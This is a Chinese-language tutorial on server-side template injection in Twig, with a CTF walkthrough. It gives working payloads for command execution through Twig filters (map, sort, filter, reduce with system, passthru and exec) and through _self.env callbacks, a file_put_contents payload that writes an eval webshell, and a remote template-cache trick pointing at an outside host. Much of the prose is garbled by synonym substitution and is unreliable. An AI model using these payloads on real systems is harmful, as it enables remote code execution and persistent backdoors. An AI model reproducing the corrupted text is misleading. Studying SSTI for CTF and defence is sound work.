SSTI,即做事器端模板注入(Server-Side Template Injection)
常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。sql注入已经出世很多年了,对付sql注入的观点和事理很多人该当是相称清楚了,SSTI也是注入类的漏洞,其成因实在是可以类比于sql注入的。
sql注入的成因是从用户得到一个输入后,经由后端脚本措辞进行数据库查询,这时我们就可以布局输入语句来进行拼接,从而实现我们想要的sql语句
SSTI也是如此,不过SSTI是在做事端吸收了输入后,将其作为web运用模板内容的一部分,在进行目标编译渲染的过程中,将恶意语句进行了拼接,因此可能造成敏感信息透露、代码实行、getshell等问题
在这我会大略以常见的Twig模板引擎进行演示,有所遗漏缺点,欢迎各位师傅们进行补充纠正
模板引擎模板是一种供应给程序进行解析的一种语法,从初始数据到实际的视觉表达靠的便是这一项事情所实现的,且这种手段是同时存在于前后真个
常见的模板引擎有
1.php 常用的
Smarty
Smarty算是一种很老的PHP模板引擎了,非常的经典,利用的比较广泛
Twig
Twig是来自于Symfony的模板引擎,它非常易于安装和利用。它的操作有点像Mustache和liquid。
Blade
Blade 是 Laravel 供应的一个既大略又强大的模板引擎。
和其他盛行的 PHP 模板引擎不一样,Blade 并不限定你在视图中利用原生 PHP代码。所有 Blade 视图文件都将被编译成原生的 PHP 代码并缓存起来,除非它被修正,否则不会重新编译,这就意味着 Blade基本上不会给你的运用增加任何额外包袱。
2.Java 常用的
JSP
这个引擎我想该当没人不知道吧,这个该当也是我最初学习的一个模板引擎,非常的经典
FreeMarker
FreeMarker是一款模板引擎:即一种基于模板和要改变的数据,并用来天生输出文本(HTML网页、电子邮件、配置文件、源代码等)的通用工具。它不是面向终极用户的,而是一个Java类库,是一款程序员可以嵌入他们所开拓产品的组件。
Velocity
Velocity作为历史悠久的模板引擎不单单可以替代JSP作为JavaWeb的做事端网页模板引擎,而且可以作为普通文本的模板引擎来增强做事端程序文本处理能力。
3.Python 常用的
Jinja2
flask jinja2 一贯是一起说的,利用非常的广泛,是我学习的第一个模板引擎
django
django 该当利用的是专属于自己的一个模板引擎,我这里姑且就叫他 django,我们都知道django 以快速开拓著称,有自己好用的ORM,他的很多东西都是耦合性非常高的,你利用别的就不能发挥出 django 的特性了
tornado
tornado 也有属于自己的一套模板引擎,tornado 强调的是异步非壅塞高并发
形形色色的模板引擎为了达到渲染效果,总会对用户输入有所处理,这也就给攻击者供应了道路,只管模板引擎也会相应供应沙箱机制进行保护,但是也存在沙箱逃逸技能可以进行绕过
攻击思路找到模板是什么模板引擎,是哪个版本的,然后设法利用模板的内置方法,进行rce、getshell
PHP-TwigTwig 被许多开源项目利用,比如 Symfony、Drupal8、eZPublish、phpBB、Matomo、OroCRM;许多框架也支持 Twig,比如 Slim、Yii、Laravel 和 Codeigniter 等等。
本地复现可以用composer搭建
在Twig引擎中,我们可以通过下面方法得到一些关于当前运用的信息(虽然常常会被ban便是...){{_self}} #指向当前运用{{_self.env}}{{dump(app)}}{{app.request.server.all|join(',')}}
根本语法
模板实在便是一个文本文件,它可以天生我们须要的任何基于文本的格式文件(html、xml、csv等)
它也没有特殊的拓展后缀名,.html、.xml、.twig都可
这里紧张讲一些我们在利用时会用到的根本知识
变量运用程序将变量传入模板中进行处理,变量可以包含你能访问的属性或元素。你可以利用 . 来访问变量中的属性(方法或 PHP 工具的属性,或 PHP 数组单元),Twig还支持访问PHP数组上的项的特定语法, foo['bar'] :
{{ foo.bar }}{{ foo['bar'] }}
全局变量
模板中始终供应以下变量:
_self :引用当前模板名称;(在twig1.x和2.x/3.x浸染不一)_context :引用当前高下文;_charset :引用当前字符集。设置变量可以为代码块内的变量赋值。赋值利用set标签:
{% set foo = 'foo' %}{% set foo = [1, 2] %}{% set foo = {'foo': 'bar'} %}
过滤器
变量可以修正为 过滤器 . 过滤器与变量之间用管道符号隔开 (| ). 可以链接多个过滤器。一个过滤器的输出运用于下一个过滤器。
下面的示例从 name 标题是:
{{ name|striptags|title }}
接管参数的筛选器在参数周围有括号。此示例通过逗号连接列表中的元素:
{{ list|join }}{{ list|join(', ') }}// {{ ['a', 'b', 'c']|join }}// Output: abc// {{ ['a', 'b', 'c']|join('|') }}// Output: a|b|c
若要对代码部分运用筛选器,请利用apply标签:
{% apply upper %} This text becomes uppercase{% endapply %}
过滤器有很多,但是我们常用的一样平常就map、sort、filter、reduce
更多内置过滤器请参考:https://twig.symfony.com/doc/3.x/filters/index.html
掌握构造掌握构造是指所有掌握程序流的东西-条件句(即 if/elseif/else/ for)循环,以及程序块之类的东西。掌握构造涌如今 {{% ... %}} 中
例如,要显示在名为 users 利用for标签:
<h1>Members</h1><ul> {% for user in users %} <li>{{ user.username|e }}</li> {% endfor %}</ul>
if标记可用于测试表达式:
{% if users|length > 0 %} <ul> {% for user in users %} <li>{{ user.username|e }}</li> {% endfor %} </ul>{% endif %}
更多 tags 请参考:https://twig.symfony.com/doc/3.x/tags/index.html
函数在 Twig 模板中可以直接调用函数,用于生产内容。如下调用了 range() 函数用来返回一个包含整数等差数列的列表:
{% for i in range(0, 3) %} {{ i }},{% endfor %}// Output: 0, 1, 2, 3,
更多内置函数请参考:https://twig.symfony.com/doc/3.x/functions/index.html
注释要在模板中注释某一行,可以利用注释语法 {# ...#}
{# note: disabled template because we no longer use this {% for user in users %} ... {% endfor %}#}
引入其他模板
Twig 供应的 include 函数可以使你更方便地在模板中引入模板,并将该模板已渲染后的内容返回到当前模板
{{ include('sidebar.html') }}
模板继续
Twig最强大的部分是模板继续。模板继续许可您构建一个基本的“skeleton”模板,该模板包含站点的所有公共元素并定义子模版可以覆写的 blocks 块。
从一个例子开始更随意马虎理解这个观点。
让我们定义一个基本模板, base.html ,它定义了可用于两列页面的HTML框架文档:
<!DOCTYPE html><html> <head> {% block head %} <link rel=34;stylesheet" href="style.css"/> <title>{% block title %}{% endblock %} - My Webpage</title> {% endblock %} </head> <body> <div id="content">{% block content %}{% endblock %}</div> <div id="footer"> {% block footer %} © Copyright 2011 by <a href="http://domain.invalid/">you</a>. {% endblock %} </div> </body></html>
在这个例子中,block标记定义了子模板可以添补的四个块。所有的 block 标记的浸染是见告模板引擎子模板可能会覆盖模板的这些部分。
子模板可能如下所示:
{% extends "base.html" %}{% block title %}Index{% endblock %}{% block head %} {{ parent() }} <style type="text/css"> .important { color: #336699; }</style>{% endblock %}{% block content %} <h1>Index</h1> <p class="important"> Welcome to my awesome homepage. </p>{% endblock %}
个中的 extends 标签是关键所在,其必须是模板的第一个标签。extends 标签见告模板引擎当前模板扩展自另一个父模板,当模板引擎评估编译这个模板时,首先会定位到父模板。由于子模版未定义并重写 footer 块,就用来自父模板的值替代利用了。
更多 Twig 的语法请参考:https://twig.symfony.com/doc/3.x/
1.x在twig 1.x版本,存在三个全局变量
_self:引用当前模板实例_context:引用高下文_charset:引用当前字符集其相对应的代码如下
protected $specialVars = [ '_self' => '$this', '_context' => '$context', '_charset' => '$this->env->getCharset()', ];
在twig 1.x中,紧张利用的是_self变量,它会返回当前 \Twig\Template 实例,并供应了指向 Twig_Environment 的 env 属性,这样我们就可以连续调用 Twig_Environment 中的其他方法
payload
{{_self.env.setCache("ftp://ip:port")}}{{_self.env.loadTemplate("backdoor")}}
通过调用setCache方法改变twig加载php的路径,在allow_url_include开启的条件下,我们就可以实现远程文件包含
在getFilter方法中存在call_user_func回调函数,通过传入参数我们可以借此调用任意函数
#getFilterpublic function getFilter($name){ ... foreach ($this->filterCallbacks as $callback) { if (false !== $filter = call_user_func($callback, $name)) { return $filter; }} return false;}public function registerUndefinedFilterCallback($callable){ $this->filterCallbacks[] = $callable;}
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}// Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
但以上漏洞都只存在于1.x,在后续版本中,_self只会返回当前实例名字符串
2.x&3.x
在这里我用twig3.x+php7.3.4作为示例
用PHP的API调用twig
index.php
<?phprequire_once "./vendor/autoload.php";$loader = new \Twig\Loader\ArrayLoader([ 'index' => 'Hello {{ name }}!',]);$twig = new \Twig\Environment($loader);$template = $twig->createTemplate("Hello {$_GET['name']}!");echo $template->render();
在twig2.x/3.x中,_self不再像1.x时那么有他独特的浸染,但是也相应更新了一些分外方法来供我们利用
map过滤器map
这个 map 过滤器将箭头函数运用于序列或映射的元素。arrow函数吸收序列或映射的值:
{% set people = [{first: "Bob", last: "Smith"},{first: "Alice", last: "Dupond"},] %}{{ people|map(p => "#{p.first} #{p.last}")|join(', ') }}{# outputs Bob Smith, Alice Dupond #}
arrow函数还吸收密钥作为第二个参数:
{% set people = {"Bob": "Smith","Alice": "Dupond",} %}{{ people|map((last, first) => "#{first} #{last}")|join(', ') }}{# outputs Bob Smith, Alice Dupond #}
把稳arrow函数可以访问当前高下文。
可以看出许可用户传一个arrow 函数,arrow 函数末了会变成一个closure
举个例子
当我们传入
{{["man"]|map((arg)=>"hello #{arg}")}}
在模板中会被编译为
twig_array_map([0 => "id"], function ($__arg__) use ($context, $macros) { $context["arg"] = $__arg__; return ("hello " . ($context["arg"] ?? null))
map所对应的函数如下
function twig_array_map($array $arrow){ $r = []; foreach ($array as $k => $v) { $r[$k] = $arrow($v $k); } return $r;}
我们可以看到,传入的 $arrow 直接就被当成函数实行,即 $arrow($v, $k),而 $v 和 $k 分别是 $array 中的 value 和 key
以是$array和$arrow都是我们可控的,那我们就可以找到有两个参数的、可以实现命令实行的危险函数来进行rce
经由查询,有如下几种常见命令实行函数
system ( string $command [, int &$return_var ] ) : stringpassthru ( string $command [, int &$return_var ] )exec ( string $command [, array &$output [, int &$return_var ]] ) : stringshell_exec ( string $cmd ) : string
有两个参数的函数就上面三种,其对应payload
{{["whoami"]|map("system")}}{{["whoami"]|map("passthru")}}{{["whoami"]|map("exec")}} // 无回显
但是当上面的都被ban了呢,我们还有没有其他方法rce
当然,例如
file_put_contents ( string $filename , mixed $data [, int $flags = 0 [, resource $context ]] ) : int
当我们找到路径后就可以利用该函数进行写shell了
?name={{{"<?php phpinfo();eval($_POST[whoami]);":"D:\\phpstudy_pro\\WWW\\shell.php"}|map("file_put_contents")}}
根据map过滤器的利用思路,我们可以再找到其他类似的,带有$arrow参数的
sort过滤器sort
这个 sort 筛选器对数组排序:
{% for user in users|sort %}...{% endfor %}
表明
在内部,Twig利用PHP asort 函数来掩护索引关联。它通过将可遍历工具转换为数组来支持这些工具。
您可以通报一个箭头函数来对数组进行排序:
{% set fruits = [ { name: 'Apples', quantity: 5 }, { name: 'Oranges', quantity: 2 }, { name: 'Grapes', quantity: 4 },] %}{% for fruit in fruits|sort((a, b) => a.quantity <=> b.quantity)|column('name') %} {{ fruit }}{% endfor %}{# output in this order: Oranges, Grapes, Apples #}
把稳 spaceship 运算符来简化比较。
类似于map,sort在模板编译时也会进入twig_sort_filter 函数
function twig_sort_filter($array, $arrow = null){ if ($array instanceof \Traversable) { $array = iterator_to_array($array); } elseif (!\is_array($array)) { throw new RuntimeError(sprintf('The sort filter only works with arrays or "Traversable", got "%s".', \gettype($array))); } if (null !== $arrow) { uasort($array, $arrow); // 直接被 uasort 调用 } else { asort($array); } return $array;}
uasort ( array &$array , callable $value_compare_func ) : bool
可以看到,$array 和$arrow直接被uasort调用
uasort会将数组中的元素按照键值进行排序,当我们自定义一个危险函数时,就可能造成rce
这样我们就可以布局payload了
{{["id", 0]|sort("system")}}{{["id", 0]|sort("passthru")}}{{["id", 0]|sort("exec")}} // 无回显
filter过滤器
filter
这个 filter 过滤器利用箭头函数过滤序列或映射的元素。arrow函数吸收序列或映射的值:
{% set sizes = [34, 36, 38, 40, 42] %}{{ sizes|filter(v => v > 38)|join(', ') }}{# output 40, 42 #}
与 for 标记,它许可筛选要迭代的项:
{% for v in sizes|filter(v => v > 38) -%}{{ v }}{% endfor %}{# output 40 42 #}
它也适用于映射:
{% set sizes = {xs: 34,s: 36,m: 38,l: 40,xl: 42,} %}{% for k, v in sizes|filter(v => v > 38) -%}{{ k }} = {{ v }}{% endfor %}{# output l = 40 xl = 42 #}
arrow函数还吸收密钥作为第二个参数:
{% for k, v in sizes|filter((v, k) => v > 38 and k != "xl") -%}{{ k }} = {{ v }}{% endfor %}{# output l = 40 #}
把稳arrow函数可以访问当前高下文。
类似于map,filter在模板编译时也会进入twig_array_filter 函数
function twig_array_filter($array, $arrow){ if (\is_array($array)) { return array_filter($array, $arrow, \ARRAY_FILTER_USE_BOTH); // $array 和 $arrow 直接被 array_filter 函数调用 } // the IteratorIterator wrapping is needed as some internal PHP classes are \Traversable but do not implement \Iterator return new \CallbackFilterIterator(new \IteratorIterator($array), $arrow);}
array_filter ( array $array [, callable $callback [, int $flag = 0 ]] ) : array
可以看到和前面方法类似,我们实验一下
得到payload
{{["id"]|filter("system")}}{{["id"]|filter("passthru")}}{{["id"]|filter("exec")}} // 无回显{{{"<?php phpinfo();eval($_POST[whoami]);":"D:\\phpstudy_pro\\WWW\\shell.php"}|filter("file_put_contents")}} // 和map过滤器一样可以写 Webshell
reduce 过滤器
reduce
这个 reduce filter利用arrow函数迭代地将序列或映射缩减为单个值,从而将其缩减为单个值。arrow函数吸收上一次迭代的返回值和序列或映射确当前值:
{% set numbers = [1, 2, 3] %}{{ numbers|reduce((carry, v) => carry + v) }}{# output 6 #}
这个 reduce 过滤器须要 initial 值作为第二个参数:
{{ numbers|reduce((carry, v) => carry + v, 10) }}{# output 16 #}
把稳arrow函数可以访问当前高下文。
直接来看函数
function twig_array_reduce($array, $arrow, $initial = null){ if (!\is_array($array)) { $array = iterator_to_array($array); } return array_reduce($array, $arrow, $initial); // $array, $arrow 和 $initial 直接被 array_reduce 函数调用}
array_reduce ( array $array , callable $callback [, mixed $initial = NULL ] ) : mixed
可以看到array_reduce是有三个参数的
$array 和 $arrow 直接被 array_filter 函数调用,我们可以利用该性子自定义一个危险函数从而达到rce
刚开始还是像前面一样布局
{{["id", 0]|reduce("passthru")}}
但是创造没有实行成功,缘故原由是第一次调用的是
passthru($initial, "id")
由于$initial为null,以是会报错,我们想要对他进行赋值才行
payload
{{[0, 0]|reduce("system", "id")}}{{[0, 0]|reduce("passthru", "id")}}{{[0, 0]|reduce("exec", "id")}} // 无回显
题目[BJDCTF2020]Cookie is so stable
进入创造一个flag按钮和一个hint按钮点击hint创造源码有hint
返回访问flag.php
经由大略测试预测为twig(传入{{7'7'}}后Jinja2输出7777777,Twig输出49)
同时创造在cookie是我们的输入点,开始查看是什么版本的twig,用_self来测试
cookieuser:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
twig1.x,我们直接cat /flag试试
cookieuser:{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
基本思路还是测试出为哪个模板,哪个版本,测试payload即可
后言SSTI 并不广泛存在,但如果开拓职员滥用模板引擎,那么就很有可能涌现SSTI,并且根据其模板引擎的繁芜性和开拓措辞的特性,很大几率会涌现非常严重的问题
遐想到最近的log4j2漏洞,与SSTI类似,都是将用户的输入当作可信任内容,这才涌现了大大小小的安全问题
一句话总结:永久不要相信用户的输入